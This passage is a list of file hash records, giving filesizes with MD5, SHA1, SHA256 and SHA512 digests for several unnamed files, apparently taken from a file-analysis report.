SHA512706058940f03e84045217cf99df0bf2a1e3cafd9ae61daa79acffa863b5403142859c1b66901d4a4deebec77b5e3c4674efa862f01211218f377d02a0a3aa19f
-
Filesize
22KB
MD5bcc4df6dd84da08e66c29c14db155e6b
SHA1a4447db2ff2f769cf09dc62e0a0fdcb1fc67e57c
SHA256ad32ebb92dcb9fe5d7c4e94d556e04960233060bb9a25aadd869b5df8d799154
SHA5129f184eb07f1c94754f77b6fa57cc91571692fdb969b6e2f913bd1f12df5f5e40ffe5603330bdb8b7d3d22c0885c71f4d58cc42de514869285b3b3d5bf90879cf
-
Filesize
171KB
MD5f3d3487191db4bbecc0a775cde827cc1
SHA143fef4f4de1185d7ca4dd5e8fa018a57e87b3d31
SHA25622a0c62fd88787fd64845a9522747f5d960fb3b53b47272b75b96c67524ee222
SHA51201c957c17d0e37203294b2a7d9fb75fee00e9c854e9b98d847befc5e7bcd9b6e053207fd9b41796e76e95b691324e2545300d1b8434a7da9207998f39b5295cd
-
Filesize
1.2MB
MD510dc9ead2950cd06bcc5c376aaac4e75
SHA10d7aafbc6d5beef00472b9af7a2ad3deed783203
SHA256f291306123de3887805ca18dcd466880ba0c33cc301b61ce9e29f9b51b3da3bf
SHA512b5d4e1d326e247d99d619ec5f0f1940c8e151831f2a7ef4d62fb38427897ff3f96bd30a074f5e1d1ad381a6167107d014215cafded5cd95648d3b229407d7ec5
-
Filesize
615KB
MD59c223575ae5b9544bc3d69ac6364f75e
SHA18a1cb5ee02c742e937febc57609ac312247ba386
SHA25690341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213
SHA51257663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09
-
Filesize
456B
MD54531984cad7dacf24c086830068c4abe
SHA1fa7c8c46677af01a83cf652ef30ba39b2aae14c3
SHA25658209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211
SHA51200056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122
-
Filesize
22KB
MD5cc1c0162d40b61897d94a98ddf0e545f
SHA1de29de89568aae292ff966db4af160249d066851
SHA256080766f1d05ad04d8c2b1b50ecda0c2e94337bbc4d019abc9170c69c7dbd3387
SHA5120897f73696c3ceb5e485747e3f9ece60110d7396383a2d34294de28322a21c00295c7d58fd0ef6aa6455f6e3a0de9ca4c5a3606076b823fbf5fe2c0bdce42a87
-
Filesize
492KB
MD50a4205c70846ce3222c82c3eb78c4e8f
SHA149c65f345b4b1283e77eaa77e944b0ecd1ed2a2d
SHA256b6f910e1742c1ababa9e3eb0b9107776e719b808440481b77d7598a48eba0e52
SHA512e608934d682c06d2b20d53aa60f4beda68ce70e11179a828a7d3f8e00ed069da9e4bfd383fe2172aa28f5600d4310180c123da63343d1ef0f483bc347390effe
-
Filesize
285KB
MD5241b6f56b77b8ea8ab18ca3d1100e326
SHA13b00d99743b8d9f9b7a18bef75f4728e5bf58dba
SHA2563824ff72cc228b282cce6c60ec05430e7ea1e9da2e455f0613d016da35d7596c
SHA51269bc35fcf480b731903010e595d4aa404461b8c7b928b81e4b9c30c88c1a237eace18f5c9f4d9f79d829ea032db73c95c4e0bef7482c3b7ef7b99b7e41a1c6d4
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82